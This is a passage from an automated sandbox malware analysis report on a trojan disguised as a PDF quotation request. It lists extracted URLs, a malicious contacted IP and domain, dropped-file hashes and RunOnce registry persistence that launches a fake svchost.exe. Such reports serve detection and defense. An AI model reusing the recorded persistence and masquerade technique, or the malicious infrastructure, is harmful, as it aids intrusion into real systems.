                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://sectigo.com/CPS0DRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000000.329692687.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ - REF 208056-pdf.exe, 00000000.00000002.403215923.0000000002581000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.539506519.0000000005161000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.524567158.00000000034C1000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.524025636.00000000050C1000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipRFQ - REF 208056-pdf.exe, 00000000.00000002.509634686.0000000003B23000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.544302148.000000000477A000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.microsoft.coaHppowershell.exe, 00000011.00000002.547914635.0000000008310000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.307045052.00000243FF046000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000003.307034624.00000243FF041000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://activity.windows.comrsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.307284356.00000243FF03E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.307256810.00000243FF013000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://%s.xboxlive.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		low
                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.mpowershell.exe, 00000011.00000002.551437427.0000000009B51000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 00000002.00000002.532241708.000001EAA1F60000.00000002.00000001.sdmpfalse
                                                                                		high
                                                                                https://dynamic.tsvchost.exe, 00000005.00000003.307003492.00000243FF04D000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#RFQ - REF 208056-pdf.exe, 00000000.00000002.492361781.000000000395D000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.554662869.0000000007201000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.524764005.0000000005201000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000002.307267041.00000243FF029000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000003.285270099.00000243FF031000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.307307178.00000243FF05D000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://activity.windows.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.306998078.00000243FF061000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://%s.dnet.xboxlive.comsvchost.exe, 00000003.00000002.513627906.000002451B03E000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              		low
                                                                                              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.307021748.00000243FF04A000.00000004.00000001.sdmpfalse
                                                                                                		high

                                                                                                Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                172.67.172.17
                                                                                                		unknownUnited States
                                                                                                		13335CLOUDFLARENETUStrue

                                                                                                Private

                                                                                                IP
                                                                                                192.168.2.1
                                                                                                127.0.0.1

                                                                                                General Information

                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                Analysis ID:358398
                                                                                                Start date:25.02.2021
                                                                                                Start time:15:14:01
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 17m 0s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:light
                                                                                                Sample file name:RFQ - REF 208056-pdf.exe
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:36
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.evad.winEXE@37/15@3/3
                                                                                                EGA Information:Failed
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 7.2% (good quality ratio 6.8%)
                                                                                                • Quality average: 82.1%
                                                                                                • Quality standard deviation: 27%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 93%
                                                                                                • Number of executed functions: 0
                                                                                                • Number of non-executed functions: 0
                                                                                                Cookbook Comments:
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Found application associated with file extension: .exe
                                                                                                Warnings:
                                                                                                Show All
                                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                                                • TCP Packets have been reduced to 100
                                                                                                • Excluded IPs from analysis (whitelisted): 51.103.5.186, 51.104.144.132, 131.253.33.200, 13.107.22.200, 52.255.188.83, 104.42.151.234, 52.147.198.201, 23.211.6.115, 184.30.20.56, 51.11.168.160, 2.20.142.209, 2.20.142.210, 92.122.213.194, 92.122.213.247, 104.43.139.144, 20.54.26.129, 52.155.217.156
                                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                15:15:04API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                15:15:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdS explorer.exe "C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe"
                                                                                                15:15:39AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdS explorer.exe "C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exe"
                                                                                                15:15:57API Interceptor25x Sleep call for process: powershell.exe modified
                                                                                                15:16:20API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                172.67.172.17CN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html
                                                                                                RFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/099966AA4311D7113F5BB60B93F45E2A.html
                                                                                                PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/645C0E3DC93FA95B6C8A8ED7479D7BE0.html
                                                                                                Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/047C6EE29B052DE5AEEBC4044252D106.html
                                                                                                DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
                                                                                                Dekont.pdf.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/543D6276259C453DE82D4E8A6F9C519D.html
                                                                                                order inquiry.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/AE1CA9ADC0D7C9BC87D3746C7E358920.html
                                                                                                IMG_5771098.xlsxGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/F31A591A992F9F10459CA91956D4B922.html
                                                                                                2070121SN-WS.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/D67358B78A0270CCB5939EF8C3384EB0.html
                                                                                                SAL-0908889000.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/707A5EEA0CF5BEFE1A44A93C9F311222.html
                                                                                                Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/A0BC51B15BADC621E7C2DA57F1F666B5.html
                                                                                                Payment Notification.docGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/C31D970F225E46D6FFA42B117CC87914.html
                                                                                                PO98000000090.jarGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/6CE96E65ABD2B0982219B89A4C828006.html
                                                                                                P O DZ564955B.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/EE9C9D2BE71BE93E8EF2E1EE1CA658F4.html
                                                                                                PO98000000090.jarGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/991C9BCC0F549AF2B1F88216FC377C57.html
                                                                                                ORIGINAL090000000.jarGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/768CB08D476E7FF779DD1110D477974C.html
                                                                                                Fireman.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/F245078D9F23F950E50BB0B3E5A55F73.html
                                                                                                PO No. 2995_pdf.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/19F80EF211BCE8F026E05C220DD03823.html
                                                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/55DEF9932F060D16BC71F37E3F290A51.html
                                                                                                CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                                                • coroloboxorozor.com/base/4F54EC6FA5BCCB7C8CBF2FD8D36F4A4B.html

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                coroloboxorozor.comCN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                RFQ_#2021-2-25-1.pdf.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                Sample Request for Proposal for Auditing Services.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                Dekont.pdf.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                order inquiry.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                IMG_5771098.xlsxGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                YrdW0m2bjE.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                em6eElVbOm.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                2070121SN-WS.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                DOC-654354.xlsxGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                xQHJ4rJmTi.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                RFQ CSDOK202040890.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                SAL-0908889000.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                Payment Notification.docGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                SecuriteInfo.com.Artemis30F445BB737F.24261.exeGet hashmaliciousBrowse
                                                                                                • 104.21.71.230
                                                                                                PO98000000090.jarGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                P O DZ564955B.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                CLOUDFLARENETUSCN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                twistercrypted.exeGet hashmaliciousBrowse
                                                                                                • 104.18.28.12
                                                                                                C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                                • 104.16.19.94
                                                                                                C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                                • 104.16.18.94
                                                                                                C1 PureQuest PO S1026710.xlsmGet hashmaliciousBrowse
                                                                                                • 104.17.234.204
                                                                                                Returned Message Body.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                W175EHpHv3.exeGet hashmaliciousBrowse
                                                                                                • 172.67.194.108
                                                                                                Bankdaten #f6356.pdf.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                W175EHpHv3.exeGet hashmaliciousBrowse
                                                                                                • 172.67.194.108
                                                                                                PO#2102003.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                Qvc Order .exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                company inquiry.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                Order NX-LI-15-0001.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                TNT eInvoice_pdf.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                000INV00776.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                SAES-0077766.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                PO.Attached98736.PDF.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                mif000262021.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                PAYMENT SWIFT USD96110_PDF.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCN-Invoice-XXXXX9808-19011143287994.exeGet hashmaliciousBrowse
                                                                                                  PRODUCT SPECIFICATION.exeGet hashmaliciousBrowse
                                                                                                    DHL_document1102202068090891.exeGet hashmaliciousBrowse
                                                                                                      em6eElVbOm.exeGet hashmaliciousBrowse
                                                                                                        Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                                          Fireman.exeGet hashmaliciousBrowse
                                                                                                            NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                              CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                                                                payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                                                                                  Vrxs6evJO7.exeGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exeGet hashmaliciousBrowse
                                                                                                                      RMe2JcmlSh.exeGet hashmaliciousBrowse
                                                                                                                        New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                                                                                                                          CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                                                            PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                                                                              CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                                                                                                quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                                                                                                  PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                                                    New Order.exeGet hashmaliciousBrowse
                                                                                                                                      PO#87498746510.exeGet hashmaliciousBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4096
                                                                                                                                        Entropy (8bit):0.597889115294713
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:0FvMk1GaD0JOCEfMuaaD0JOCEfMKQmD2utAl/gz2cE0fMbhEZolrRSQ2hyYIIT:05GaD0JcaaD0JwQQ2utAg/0bjSQJ
                                                                                                                                        MD5:C664243FC27035F720256C6B25D79A29
                                                                                                                                        SHA1:24F1AF0205F776EDF15128AE46A6DABA6450F8C7
                                                                                                                                        SHA-256:4CDBB7488D24303793F8CF2D0C03BB25443CFEE2BB0D319C73909E91E500E0F3
                                                                                                                                        SHA-512:B559AA386F3EE1A63C2C07439817EBF38CA9E3EE52DCE327D5BFAB7A17F9F1243FAA74FA3CBEA643B9C877428E81DD7F6FC1239C3655C4BDAFDA6DE2635A390E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ......:{..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x614d938a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.09469397928593626
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:5zwl/+zVRIE11Y8TRXxc7lwqKfzwl/+zVRIE11Y8TRXxc7lwqK:50+zVO4blMwqKf0+zVO4blMwqK
                                                                                                                                        MD5:E2D4D11F0701256A691B3C649505527D
                                                                                                                                        SHA1:2C6BCCBE7748E05DC1E80A165C58C79B3A2C1ECD
                                                                                                                                        SHA-256:1CB400EB6534FA7DCB5A2EDA443B9AD6797AD23C0AD52BE728B9A3432A95FB37
                                                                                                                                        SHA-512:D8BB1A654E7A7F153536044C933FD53B32A1834C445F01D360008809207E372A507499D3A76EA9C2DF00A1196EA743324788F43BFC498660D4345424BA038F12
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: aM..... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................3.....y...................|.......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8192
                                                                                                                                        Entropy (8bit):0.1093288637601826
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:QhRm/t7EvgJ8BK+Al/bJdAti/0cwX/all:QHm1igJN+At4glwG
                                                                                                                                        MD5:866F5280185C6141740F793982D4D490
                                                                                                                                        SHA1:DC9BBAAFE4CA6E76B5EC3934B1E6B4874A905A46
                                                                                                                                        SHA-256:FA3BE1BEB42DDDE6BF6E1264FDE7B9EBD8B8670BB527DA964A460B39E9C10531
                                                                                                                                        SHA-512:F77A01D64895543819100DC0F2BC33AE67736BDF169E82877CBE15D8184C2F9F587FE510217282502F835C2D4759A2B9E180A17003E49D7200BE3378F170AF3A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: Y$.4.....................................3...w.......y.......w...............w.......w....:O.....w...................|.......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):14734
                                                                                                                                        Entropy (8bit):4.993014478972177
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                                        MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                                        SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                                        SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                                        SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                        C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exe
                                                                                                                                        Process:C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):91000
                                                                                                                                        Entropy (8bit):6.241345766746317
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                        MD5:17FC12902F4769AF3A9271EB4E2DACCE
